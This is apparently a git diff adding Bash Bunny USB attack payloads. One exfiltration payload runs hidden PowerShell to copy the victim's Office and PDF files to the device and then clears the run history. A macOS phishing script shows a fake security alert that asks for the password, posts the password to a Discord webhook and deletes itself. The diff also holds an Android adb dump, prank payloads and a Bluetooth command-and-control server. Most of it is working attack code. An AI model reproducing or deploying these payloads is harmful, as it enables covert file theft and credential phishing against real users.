# 4. wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz
# 5. tar -xzvf impacket-0.9.19.tar.gz ; mv -v impacket-0.9.19/ impacket/
#
#
# LED STATUS
# ==========
# FAIL........Failed to find dependencies
# STAGE1......Ethernet Stage
# STAGE2......HID Stage
# SPECIAL.....Receiving Files
# CLEANUP.....Moving Liberated Files
# FINISH......Finished
#
# OPTIONS
# =======
# Exfiltration options configured from included s.ps1 script
######## INITIALIZATION ########
REQUIRETOOL impacket
GET SWITCH_POSITION
# Make temporary loot directory
mkdir -p /loot/smb/
# Delete any old exfiltration data
rm -rf /loot/smb/*
# Copy new powershell payload to smb share
cp /root/udisk/payloads/$SWITCH_POSITION/s.ps1 /loot/smb/
# Make loot directory on USB Disk
mkdir -p /root/udisk/loot/smb_exfiltrator
######## ETHERNET STAGE ########
LED STAGE1
ATTACKMODE RNDIS_ETHERNET
# Start the SMB Server
python /tools/impacket/examples/smbserver.py -username user -password Password01 -smb2support -comment '1337' s /loot/smb >> /loot/smbserver.log &
######## HID STAGE ########
# Runs hidden powershell which executes \\172.16.64.1\s\s.ps1
GET HOST_IP
LED STAGE2
ATTACKMODE HID RNDIS_ETHERNET
RUN WIN powershell
Q DELAY 1000
Q STRING powershell -windowstyle hidden -exec bypass "net use \\\\$HOST_IP\\s /u:user Password01; powershell -windowstyle hidden -exec bypass \\\\$HOST_IP\\s\\s.ps1; exit"
Q DELAY 500
Q ENTER
LED SPECIAL
# Wait until files are done copying
while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done
######## CLEANUP ########
LED CLEANUP
# Delete EXFILTRATION_COMPLETE file
rm -rf /loot/smb/EXFILTRATION_COMPLETE
# Move files to udisk loot directory
mv /loot/smb/e/* /root/udisk/loot/smb_exfiltrator
# Clean up temporary loot directory
rm -rf /loot/smb/e/*
# Sync file system
sync
######## FINISH ########
# Trap is clean
LED FINISH

9
payloads/library/exfiltration/smb_exfiltratorV2.0/s.ps1 Normal file
View File

@@ -0,0 +1,9 @@
$exfil_dir="$Env:UserProfile\Documents"
$exfil_ext="*.docx"
$exfil_ext1="*.pdf"
$exfil_ext2="*.xlsx"
$loot_dir="\\172.16.64.1\s\e\$Env:ComputerName\$((Get-Date).ToString('yyyy-MM-dd_hhmmtt'))"
mkdir $loot_dir
robocopy $exfil_dir $loot_dir $exfil_ext $exfil_ext1 $exfil_ext2 /S /MT /Z
New-Item -Path \\172.16.64.1\s -Name "EXFILTRATION_COMPLETE" -Value "EXFILTRATION_COMPLETE"
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue

46
payloads/library/mobile/android/adb_shell_dumpsys/payload.txt Normal file
View File

@@ -0,0 +1,46 @@
# Title: adb shell dumpsys
# Author: D14b0l1c
#
# Description:
# Set the Bash Bunny to ECM Ethernet attack mode
# Extract the IP address of the connected device from DHCP leases
# Connect to the device using ADB over TCP/IP and save the output to a log file
# Dump system information from the device and save it to a file
# Indicate that the payload has finished executing
#
# LED States:
# - Purple: Running HID emulation, connecting to the Android device
# - Blue Blinking: Running the 'adb shell dumpsys' command
# - Red Blinking: Failed to connect to the Android device
# - Green: Finished
# Set the Bash Bunny to ECM Ethernet attack mode
ATTACKMODE ECM_ETHERNET
# Wait for 5 seconds to ensure the network interface is ready
sleep 5
# Extract the IP address of the connected device from DHCP leases
TARGET_IP=$(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq)
# Save the obtained IP address to a log file
cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq > /root/logs.txt
# Connect to the device using ADB over TCP/IP and save the output to a log file
adb connect ${TARGET_IP}
adb connect ${TARGET_IP} > /root/logs.txt
# Wait for 20 seconds (optional)
sleep 20
# Dump system information from the device and save it to a file
adb shell dumpsys > /root/dumpsys.txt
# Wait for 10 seconds (optional)
sleep 10
# Set the Bash Bunny back to ECM Ethernet attack mode
ATTACKMODE ECM_ETHERNET
# Indicate that the payload has finished executing
LED FINISH

35
payloads/library/mobile/android/adb_shell_dumpsys/readme.md Normal file
View File

@@ -0,0 +1,35 @@
## Requirements
Before using this Bash Bunny payload, please ensure you meet the following requirements:
- **Bash Bunny device**: This payload is designed to run on the Bash Bunny hardware platform. Make sure you have a Bash Bunny device available.
- **Installation of essential `adb` packages**: In order to enable `adb` functionality on the Bash Bunny, you need to install the following packages:
- `android-liblog`
- `android-libbase`
- `android-libcutils`
- `android-libadb`
- `adb`
### Installing Essential `adb` Packages
To install the required `adb` packages on your Bash Bunny, follow these steps:
1. Connect your Bash Bunny to a computer.
2. Open a terminal window and navigate to the Bash Bunny storage directory.
3. Execute the following commands to download and install the essential `adb` packages:
```bash
wget --no-check-certificate https://archive.debian.org/debian/pool/main/a/android-platform-system-core/android-liblog_7.0.0+r33-1_armhf.deb
dpkg -i android-liblog_7.0.0+r33-1_armhf.deb
wget --no-check-certificate https://archive.debian.org/debian/pool/main/a/android-platform-system-core/android-libbase_7.0.0+r33-1_armhf.deb
dpkg -i android-libbase_7.0.0+r33-1_armhf.deb
wget --no-check-certificate https://archive.debian.org/debian/pool/main/a/android-platform-system-core/android-libcutils_7.0.0+r33-1_armhf.deb
dpkg -i android-libcutils_7.0.0+r33-1_armhf.deb
wget --no-check-certificate https://archive.debian.org/debian/pool/main/a/android-platform-system-core/android-libadb_7.0.0+r33-1_armhf.deb
dpkg -i android-libadb_7.0.0+r33-1_armhf.deb
wget --no-check-certificate https://archive.debian.org/debian/pool/main/a/android-platform-system-core/adb_7.0.0+r33-1_armhf.deb
dpkg -i adb_7.0.0+r33-1_armhf.deb

24
payloads/library/phishing/MacAlertPhisher/README.md Normal file
View File

@@ -0,0 +1,24 @@
# MacAlertPhisher
* Author: 90N45
* Version: 1.0
* Target: Mac
* Attackmodes: HID, STORAGE
### Description
Creates a customizable alert that prompts for the victim's credentials and shares them with you via Discord. Even after unplugging the Bash Bunny.
<img width="532" alt="MAcAlertPhisher_alert_preview" src="https://github.com/90N45-d3v/bashbunny-payloads/assets/79598596/d52f4924-c51a-46fd-b2c3-2a8cce45e2cc">
<br>
<img width="412" alt="MacAlertPhisher_message_preview" src="https://github.com/90N45-d3v/bashbunny-payloads/assets/79598596/8d4e804c-0630-4853-b4ed-7d0904408a50">
### Setup
Please insert your [Discords Webhook](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) link into the `discord` variable in the `script.sh` file. Optional, you can change the other variables at the top of the `script.sh` file to your needs.
### Status
| LED | State |
| --- | --- |
| Magenta solid (SETUP) | Set ATTACKMODE |
| Yellow single blink (ATTACK) | Prepaires and executes phishing-script on the victims machine |
| Green 1000ms VERYFAST blink followed by SOLID (FINISH) | Attack finished (Ready to unplug) |
*Average runtime: 27 seconds*

37
payloads/library/phishing/MacAlertPhisher/payload.txt Normal file
View File

@@ -0,0 +1,37 @@
#!/bin/bash
#
# Title: MacAlertPhisher
# Description: Creates a customizable alert that prompts for the victim's credentials and shares them with you via Discord. Even after unplugging the Bash Bunny.
# Author: 90N45
# Version: 1.0
# Category: Phishing
# Attackmodes: HID, STORAGE
LED SETUP
ATTACKMODE HID VID_0X05AC PID_0X021E STORAGE
LED ATTACK
QUACK GUI SPACE
QUACK DELAY 1000
QUACK STRING terminal
QUACK ENTER
QUACK DELAY 2500
QUACK STRING "cp /Volumes/BashBunny/payloads/${SWITCH_POSITION}/script.sh /tmp/script.sh"
QUACK ENTER
QUACK DELAY 1000
QUACK STRING "diskutil eject /Volumes/BashBunny/"
QUACK ENTER
QUACK STRING "chmod +x /tmp/script.sh && nohup bash /tmp/script.sh &> /dev/null &"
QUACK ENTER
QUACK DELAY 2000
QUACK GUI SPACE
QUACK DELAY 1000
QUACK STRING terminal
QUACK ENTER
QUACK DELAY 1000
QUACK STRING "killall Terminal"
QUACK ENTER
LED FINISH

76
payloads/library/phishing/MacAlertPhisher/script.sh Normal file
View File

@@ -0,0 +1,76 @@
#!/bin/bash
# Discord Webhook Link (NEEDED)
discord=""
# The alert's title
title="Macintosh Security Assistant"
# The alert's text
dialog="Your Mac has detected unusual activity. Enter your password to confirm that you are the owner."
# The alert's icon (for ex. "stop", "caution", "note")
icon="stop"
# A custom application, that should open the alert (for ex. "Finder")
app=""
# Base64 encode the entered string to prevent an injection/error
base64=false
# Check if an internet connection is available and wait until it is before trying to send the Discord message
internet_check=false
#### The main script
date=$(date)
user=$(whoami)
if [[ ${app} != "" ]]; then
pwd=$(osascript -e 'tell app "'"${app}"'" to display dialog "'"${dialog}"'" default answer "" with icon '"${icon}"' with title "'"${title}"'" buttons {"Continue"} default button "Continue" with hidden answer')
elif [[ ${app} == "" ]]; then
pwd=$(osascript -e 'display dialog "'"${dialog}"'" default answer "" with icon '"${icon}"' with title "'"${title}"'" buttons {"Continue"} default button "Continue" with hidden answer')
fi
pwd=${pwd#*"button returned:Continue, text returned:"}
if [[ ${base64} == true ]]; then
pwd=$(echo $pwd | base64)
enc_txt="(Base64)"
else
enc_txt=""
fi
# Discord Embed Message
embed="{
\"embeds\": [
{
\"color\": 14427938,
\"footer\": {
\"text\": \"Captured: ${date}\"
},
\"author\": {
\"name\": \"Bash Bunny • MacAlertPhisher\",
\"url\": \"https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/phishing/MacAlertPhisher\",
\"icon_url\": \"https://www.gitbook.com/cdn-cgi/image/width=40,dpr=2,height=40,fit=contain,format=auto/https%3A%2F%2F3076592524-files.gitbook.io%2F~%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FnxJgJ9UdPfrcuL1U8DpL%252Ficon%252F1UaEKnAJMPWZDBVtU8Il%252Fbb.png%3Falt%3Dmedia%26token%3D43bf1669-462c-4295-b30b-94c295470371\"
},
\"fields\": [
{
\"name\": \"Current User\",
\"value\": \"${user}\",
\"inline\": true
},
{
\"name\": \"Entered Credentials ${enc_txt}\",
\"value\": \"${pwd}\",
\"inline\": true
}
]
}
]
}"
if [[ ${internet_check} == true ]]; then
while [[ $(ping -c1 google.com | grep -c "1 packets received") != "1" ]]; do
sleep 5
done
fi
curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "${embed}" ${discord}
# Self destruct
rm /tmp/script.sh

2
payloads/library/prank/-BB-AcidBurn/README.md
View File

@@ -105,7 +105,7 @@ Arf
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
* [0iphor13](https://github.com/0iphor13)
* [0i41E](https://github.com/0i41E)
* [PhilSutter](https://github.com/PhilSutter)

2
payloads/library/prank/-BB-JumpScare/README.md
View File

@@ -93,7 +93,7 @@ I am Jakoby
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
* [0iphor13](https://github.com/0iphor13)
* [0i41E](https://github.com/0i41E)
* [PhilSutter](https://github.com/PhilSutter)

17
payloads/library/prank/SleepyMacRick/README.md Normal file
View File

@@ -0,0 +1,17 @@
# SleepyMacRick
* Author: 90N45
* Version: 1.0
* Target: Mac
* Attackmodes: HID, STORAGE
### Description
Installs a script that will listen for user activity in the background. When the user starts working on his machine, a „Rick Roll“ will be triggered.
### Status
| LED | State |
| --- | --- |
| Magenta solid (SETUP) | Set ATTACKMODE |
| Yellow single blink (ATTACK) | Setup and run script on the Mac |
| Green 1000ms VERYFAST blink followed by SOLID (FINISH) | „Rick Roll“ is ready and listening for activity |
*Average runtime: 23 seconds*

25
payloads/library/prank/SleepyMacRick/payload.txt Normal file
View File

@@ -0,0 +1,25 @@
#!/bin/bash
LED SETUP
ATTACKMODE HID VID_0X05AC PID_0X021E STORAGE
LED ATTACK
# Open terminal
QUACK GUI SPACE
QUACK DELAY 1000
QUACK STRING terminal
QUACK ENTER
QUACK DELAY 1500
QUACK STRING "cp /Volumes/BashBunny/payloads/${SWITCH_POSITION}/rick.sh /tmp/rick.sh"
QUACK ENTER
QUACK DELAY 1000
QUACK STRING "diskutil eject /Volumes/BashBunny/"
QUACK ENTER
QUACK STRING "chmod +x /tmp/rick.sh && nohup bash /tmp/rick.sh &> /dev/null &"
QUACK ENTER
QUACK STRING "killall Terminal"
QUACK ENTER
LED FINISH

14
payloads/library/prank/SleepyMacRick/rick.sh Normal file
View File

@@ -0,0 +1,14 @@
#! /bin/bash
sleep 3
inactive=$(osascript -e 'tell application "System Events" to tell (first process whose frontmost is true) to return name')
while [[ ${inactive} = $(osascript -e 'tell application "System Events" to tell (first process whose frontmost is true) to return name') ]]; do
sleep 0.5
done
osascript -e "set volume output volume 100"
open -u "https://www.youtube.com/watch?v=xvFZjo5PgG0"
# Self destruct
rm /tmp/rick.sh

21
payloads/library/prank/TV-Menu-Trigger/README.md Normal file
View File

@@ -0,0 +1,21 @@
# TV-Menu-Trigger
* Author: 90N45
* Version: 1.0
* Target: TV
* Attackmodes: HID
### Description
This payload opens the main menu of a TV repeatedly at a random interval (1-10 minutes) to confuse and annoy the user.
### Explanation
Almost every TV has the function of being used by a connected USB keyboard. Therefore, we can use the Bash Bunny to emulate a keyboard and inject keystrokes into the TV. In this case, we inject the keycode for the `GUI` key to open the TV's menu (equivalent to the MENU button on your traditional remote control). Of course, the key required to open the menu could change, because of different vendors, but the keycode of the `GUI` key seems to work for most TVs.
### Tip
Plug your Bash Bunny into a USB port of the TV before it is switched on by your target. This makes it easier to overlook the possible message of a connected keyboard (especially with webOS/LG TVs, as the message is very small on these models and is displayed for a short time).
### Status
| LED | State |
| --- | --- |
| Magenta solid (SETUP) | Set ATTACKMODE and configure CPU performance |
| Green 1000ms VERYFAST blink followed by SOLID (FINISH) | Attacking the TV (Currently waiting for the random interval to complete) |
| Red 1000ms | Opening the TVs menu |

35
payloads/library/prank/TV-Menu-Trigger/payload.txt Normal file
View File

@@ -0,0 +1,35 @@
#!/bin/bash
#
# Title: TV-Menu-Trigger
# Description: This payload opens the main menu of a TV repeatedly at a random interval (1-10 minutes) to confuse and annoy the user.
# Author: 90N45
# Version: 1.0
# Category: Prank
# Attackmodes: HID
LED SETUP
ATTACKMODE HID
# Tune the Bash Bunny's CPU to low power/performance for long term deployments
CUCUMBER ENABLE
LED FINISHED
while [[ true ]]; do
LED G
# Generate interval time
rand=$((6 + $RANDOM % 60))
interval="$rand"0000
# Wait given interval time
Q DELAY ${interval}
# LED feedback on HID injection
LED R
# Open menu
Q GUI
Q DELAY 1000
done

46
payloads/library/remote_access/BlueBunny/C2/BunnyLE.py Normal file
View File

@@ -0,0 +1,46 @@
import pygatt
import base64
adapter = pygatt.GATTToolBackend()
char_uuid = '0000fff2-0000-1000-8000-00805f9b34fb'
def init():
adapter.start()
return True
def connect():
device_name = 'BlueBunny'
devices = adapter.scan(run_as_root=True)
device = next((d for d in devices if d['name'] == device_name), None)
if device:
device_address = device['address']
bunny = adapter.connect(device_address)
return bunny
else:
return False
def send(bunny, data: str, d_type: str):
if d_type == "cmd":
flag = "<CMD>"
else:
flag = "<PAYLOAD>"
data = flag + data + flag
data = base64.b64encode(data.encode("utf-8")).decode("utf-8")
if not len(data) <= 15:
data_pieces = []
for i in range(0, len(data), 15):
data_pieces.append(data[i:i + 15])
for i, piece in enumerate(data_pieces):
if i == (len(data_pieces) - 1):
bunny.char_write(char_uuid, (piece + "\n").encode("utf-8"))
else:
bunny.char_write(char_uuid, piece.encode("utf-8"))
else:
bunny.char_write(char_uuid, (data + "\n").encode("utf-8"))

61
payloads/library/remote_access/BlueBunny/C2/c2-server.py Normal file
View File

@@ -0,0 +1,61 @@
from flask import Flask, request, render_template, jsonify
import urllib.parse
import threading
import BunnyLE
app = Flask(__name__)
bb = None
connection = 0
con_fail_count = 0
def connect_bunny():
global bb
global connection
global con_fail_count
BunnyLE.init()
current_try = BunnyLE.connect()
if not current_try == False:
bb = current_try
connection = 1
else:
con_fail_count += 1
connection = 2
@app.route("/", methods=['GET', 'POST'])
def index():
if request.method == 'POST':
global bb
query = request.form.get('query')
mode = request.form.get('mode')
BunnyLE.send(bb, query, mode)
return render_template("index.html")
@app.route("/connect", methods=['GET'])
def connect():
connect_thread = threading.Thread(target=connect_bunny)
connect_thread.start()
return render_template("connecting.html")
@app.route("/con-check", methods=['GET'])
def connectCheck():
global con_fail_count
if connection == 0:
return jsonify(connected=0)
elif connection == 1:
return jsonify(connected=1)
elif connection == 2:
if con_fail_count < 5:
connect_bunny()
return jsonify(connected=0)
else:
return jsonify(connected=2)
if __name__ == '__main__':
app.run(host="localhost", port=1472, debug=True)

BIN
payloads/library/remote_access/BlueBunny/C2/static/bb_icon.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 3.7 KiB

BIN
payloads/library/remote_access/BlueBunny/C2/static/bb_icon_original.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 1.8 KiB

7
payloads/library/remote_access/BlueBunny/C2/static/bootstrap.min.css vendored Normal file
View File

File diff suppressed because one or more lines are too long

BIN
payloads/library/remote_access/BlueBunny/C2/static/logo.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 44 KiB

163
payloads/library/remote_access/BlueBunny/C2/templates/connecting.html Normal file
View File

@@ -0,0 +1,163 @@
<!DOCTYPE html>
<html>
<head>
<link rel="SHORTCUT ICON" type="image/x-icon" href="static/bb_icon.png"/>
<link rel="icon" type="image/x-icon" href="static/bb_icon.png" />
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>BlueBunny</title>
<meta name="description" content="Remote control your Bash Bunny MKII">
<link href="static/bootstrap.min.css" rel="stylesheet">
<style type="text/css">
.btn-imp {
--bs-btn-color: #EC1A24 !important;
--bs-btn-border-color: #EC1A24 !important;
--bs-btn-hover-border-color: #1a62ec !important;
--bs-btn-hover-bg: #1a62ec !important;
--bs-btn-hover-color: #ffffff !important;
}
@keyframes spinner {
0% {transform: rotate( 0deg ) scale( 1 );}
100% {transform: rotate( 360deg ) scale( 1 );}
};
</style>
<script type="text/javascript">
let fail_counter = 0
function tryAgain() {
document.getElementById("action").innerHTML = '<h3 class="text-center" style="color: #ced4da; margin-bottom: 10px;">Connecting your Bash Bunny...</h3><div class="text-center" style="margin-top: 100px;"><a class="btn btn-imp" title="Connect" href="/connect" id="connectBtn">Too many fails occured... Try again</a><br><br><p class="fw-bold">OR</p></div><ul style="margin-bottom: 100px;"><li>Make sure your bluetooth adapter is running properly</li><li>Restart your Bash Bunny via unplugging and plugging it back in</li><li>Restart the BlueBunny C2 server\'s operating system</li></ul><p>Please be patient - Making BLE connections can be buggy. It\'s likely a temporary problem that will be gone in a minute.</p>'
}
function connectionCheck() {
fetch("/con-check").then(function(response) {
return response.json();
}).then(function(data) {
if (data.connected == 1) {
window.location.replace("/");
} else if (data.connected == 2) {
tryAgain();
}
})
}
setInterval(connectionCheck, 5000);
</script>
</head>
<body style="background-color: #202124; color: #adb5bd; height: 100%; overflow: hidden">
<div style="filter: blur(2.5px); position: absolute; width: 100%; height: 100%;">
<nav class="navbar navbar-expand navbar-light fixed-top shadow-sm" style="border-bottom: solid; border-color: #1a62ec; border-width: 2.5px; background: #202124;">
<div class="container-fluid">
<a class="navbar-brand">
<img src="static/logo.png" style="height: 45px; padding-right: 15px; filter: brightness(0) saturate(100%) invert(23%) sepia(75%) saturate(3313%) hue-rotate(217deg) brightness(99%) contrast(86%);" class="d-inline-block">
</a>
<button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarToggler" aria-controls="navbarToggler" aria-expanded="false" aria-label="Toggle navigation">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse" id="navbarToggler">
<ul class="nav ms-auto">
<li class="nav-item">
<button class="btn" title="Connect" disabled>Connect to Bash Bunny</button>
</li>
<li class="nav-item" style="margin: auto; margin-right: 15px; margin-left: 20px;">
<a>©</a>
</li>
</ul>
</div>
</div>
</nav>
<nav class="navbar navbar-expand-lg navbar-light" style="visibility: hidden;">
<div class="container-fluid">
<a class="navbar-brand" href="#">
<img src="static/bb_icon.png" style="height: 45px; padding-right: 15px;" class="d-inline-block"><span style="vertical-align: middle;">BlueBunny</span>
</a>
<button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarToggler" aria-controls="navbarToggler" aria-expanded="false" aria-label="Toggle navigation">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse">
<ul class="nav">
<li class="nav-item">
<a class="btn">Connect to Bash Bunny</a>
</li>
<li class="nav-item" style="margin: auto; margin-right: 15px; margin-left: 20px;">
<a>©</a>
</li>
</ul>
<ul class="nav ms-auto">
<li class="nav-item">
<a class="nav-link">©</a>
</li>
</ul>
</div>
</div>
</nav>
<br>
<br>
<div class="container" style="display: flex; flex-flow: wrap; justify-content: start;">
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
<h4 style="color: #ced4da;">Payload One-Liner <p class="text-dark-emphasis" style="font-size: 15px;"><small>Run a single line of code</small></p></h4>
<div class="input-group mb-3">
<input type="text" class="form-control" placeholder="Q ALT F4" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;">
<button class="btn">Run</button>
</div>
</div>
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
<h4 style="color: #ced4da;">Payload Script <p class="text-dark-emphasis" style="font-size: 15px;"><small>Upload and execute a payload file</small></p></h4>
<div class="input-group mb-3">
<input type="file" class="form-control" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;">
</div>
<button class="btn">Execute Payload</button>
</div>
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
<h4 style="color: #ced4da;">Attack Mode <p class="text-dark-emphasis" style="font-size: 15px;"><small>Configure Ethernet, Storage, HID and Serial</small></p></h4>
<div class="input-group">
<select class="form-select" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;">
<option selected>None</option>
</select>
<button class="btn">Update</button>
</div>
</div>
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
<h4 style="color: #ced4da;">LED <p class="text-dark-emphasis" style="font-size: 15px;"><small>Light up your Bush Bunny</small></p></h4>
<div class="input-group">
<select class="form-select" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;" name="query">
<option selected>Green</option>
</select>
<button class="btn">Update</button>
</div>
</div>
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
<h4 style="color: #ced4da;">CPU <p class="text-dark-emphasis" style="font-size: 15px;"><small>Tune the CPU to your needs</small></p></h4>
<div class="input-group">
<select class="form-select" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;">
<option selected>Quad Core Ondemand (Default)</option>
</select>
<button class="btn">Update</button>
</div>
</div>
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
<h4 style="color: #ced4da;">Power <p class="text-dark-emphasis" style="font-size: 15px;"><small>Take a break</small></p></h4>
<div class="input-group">
<select class="form-select" style="background-color: #202124; border-color: #EC1A24; color: #adb5bd;">
<option selected>Shutdown</option>
</select>
<button class="btn btn-imp">Initialize</button>
</div>
</div>
</div>
</div>
<div style="position: absolute; width: 100%; height: 100%;">
<div style="display: flex; justify-content: center; align-items: center; margin-top: 25px;">
<div class="rounded shadow" style="border: solid; border-color: #1a62ec; border-width: 1px; background: #202124; max-width: 600px; height: fit-content; margin-left: 15px; margin-right: 15px; display: flex; justify-content: center;">
<div style="margin: 20px; width: 100%" id="action">
<h3 class="text-center" style="color: #ced4da; margin-bottom: 10px;">Connecting your Bash Bunny...</h3>
<div class="text-center" style="margin-top: 100px; margin-bottom: 100px;">
<img src="static/bb_icon.png" style="height: 5rem; width: 5rem; animation-name: spinner; animation-duration: 1s; animation-delay: 1s; animation-iteration-count: infinite;">
</div>
<p>This can take some time. Make sure your Bash Bunny is nearby and the BlueBunny payload is running successfully (Green LED).</p>
</div>
</div>
</div>
</div>
</body>
</html>

337
payloads/library/remote_access/BlueBunny/C2/templates/index.html Normal file
View File

@@ -0,0 +1,337 @@
<!DOCTYPE html>
<html>
<head>
<link rel="SHORTCUT ICON" type="image/x-icon" href="static/bb_icon.png"/>
<link rel="icon" type="image/x-icon" href="static/bb_icon.png" />
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>BlueBunny</title>
<meta name="description" content="Remote control your Bash Bunny MKII">
<link href="static/bootstrap.min.css" rel="stylesheet">
<style type="text/css">
.btn-imp {
--bs-btn-color: #EC1A24 !important;
--bs-btn-border-color: #EC1A24 !important;
--bs-btn-hover-border-color: #1a62ec !important;
--bs-btn-hover-bg: #1a62ec !important;
--bs-btn-hover-color: #ffffff !important;
}
.btn {
--bs-btn-color: #1a62ec;
--bs-btn-border-color: #1a62ec;
--bs-btn-hover-border-color: #1a62ec;
--bs-btn-hover-bg: #1a62ec;
--bs-btn-hover-color: #ffffff;
}
code {
color: #1a62ec;
}
.form-control::placeholder {
color: #adb5bd;
opacity: 0.5;
}
</style>
<script type="text/javascript">
function disableControl() {
forms = document.getElementsByClassName('form');
for (i = 0; i < forms.length; i++) {
forms[i].getElementsByTagName('form')[0].hidden = true;
forms[i].getElementsByTagName('h6')[0].hidden = false;
}
}
function enableControl() {
forms = document.getElementsByClassName('form');
for (i = 0; i < forms.length; i++) {
forms[i].getElementsByTagName('h6')[0].hidden = true;
forms[i].getElementsByTagName('form')[0].hidden = false;
}
}
function connectionCheck() {
fetch("/con-check").then(function(response) {
return response.json();
}).then(function(data) {
if (data.connected == 0 || data.connected == 2) {
document.getElementById("connectBtn").hidden = false;
disableControl();
} else if (data.connected == 1) {
document.getElementById("connectBtn").hidden = true;
enableControl();
}
})
}
function info(topic) {
window.scrollTo(0, 0);
document.getElementsByTagName("BODY")[0].style["overflow"] = "hidden";
document.getElementById("page").style["filter"] = "blur(2.5px)";
document.getElementById("page").style["position"] = "absolute";
document.getElementById("page").style["width"] = "100%";
document.getElementById("page").style["height"] = "100%";
document.getElementById(topic).hidden = false;
}
function infoClose(topic) {
document.getElementsByTagName("BODY")[0].style["overflow"] = null;
document.getElementById("page").style["filter"] = null;
document.getElementById("page").style["position"] = null;
document.getElementById("page").style["width"] = null;
document.getElementById("page").style["height"] = null;
document.getElementById(topic).hidden = true;
}
function execPayloadFile() {
const reader = new FileReader();
reader.readAsText(document.getElementById("payloadFile").files[0]);
reader.onloadend = () => {
query = reader.result;
document.getElementById("payloadContent").value = query;
document.getElementById("payloadForm").submit();
};
}
connectionCheck()
setInterval(connectionCheck, 10000);
</script>
</head>
<body style="background-color: #202124; color: #adb5bd; height: 100%">
<div id="page">
<div>
<nav class="navbar navbar-expand navbar-light fixed-top shadow-sm" style="border-bottom: solid; border-color: #1a62ec; border-width: 2px; background: #202124;">
<div class="container-fluid">
<a class="navbar-brand">
<img src="static/logo.png" onclick="info('info_cp')" style="cursor: pointer; height: 45px; padding-right: 15px; padding-bottom: 5px; filter: brightness(0) saturate(100%) invert(23%) sepia(75%) saturate(3313%) hue-rotate(217deg) brightness(99%) contrast(86%);" class="d-inline-block">
</a>
<button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarToggler" aria-controls="navbarToggler" aria-expanded="false" aria-label="Toggle navigation">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse" id="navbarToggler">
<ul class="nav ms-auto">
<li class="nav-item">
<a class="btn btn-imp" title="Connect" href="/connect" id="connectBtn" hidden>Connect to Bash Bunny</a>
</li>
<li class="nav-item" style="margin: auto; margin-right: 15px; margin-left: 20px;">
<a style="cursor: pointer; font-size: 1.25rem;" title="Copyright & Attribution" onclick="info('info_cp')">©</a>
</li>
</ul>
</div>
</div>
</nav>
<nav class="navbar navbar-expand-lg navbar-light" style="visibility: hidden;">
<div class="container-fluid">
<a class="navbar-brand" href="#">
<img src="static/bb_icon.png" style="height: 45px; padding-right: 15px;" class="d-inline-block"><span style="vertical-align: middle;">BlueBunny</span>
</a>
<button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarToggler" aria-controls="navbarToggler" aria-expanded="false" aria-label="Toggle navigation">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse">
<ul class="nav">
<li class="nav-item">
<a class="btn">Connect to Bash Bunny</a>
</li>
<li class="nav-item" style="margin: auto; margin-right: 15px; margin-left: 20px;">
<a>©</a>
</li>
</ul>
</div>
</div>
</nav>
</div>
<br>
<br>
<div class="container" style="display: flex; flex-flow: wrap; justify-content: start;">
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
<h4 style="color: #ced4da;">Payload One-Liner <p class="text-dark-emphasis" style="font-size: 15px;"><small>Run a single line of code</small></p></h4>
<div class="form">
<form action="" method="POST" hidden>
<div class="input-group mb-3">
<input type="text" class="form-control" placeholder="Q ALT F4" autocomplete="off" list="datalistOptions" name="query" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;">
<datalist id="datalistOptions">
<option value="Q STRING Hello World!"></option>
<option value="Q CAPSLOCK"></option>
<option value="Q ALT F4"></option>
<option value="Q COMMAND q"></option>
<option value="Q WIN r"></option>
<option value="Q COMMAND SPACE"></option>
</datalist>
<input type="hidden" name="mode" value="cmd">
<button class="btn" type="submit">Run</button>
</div>
</form>
<h6 hidden>Not available</h6>
</div>
</div>
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
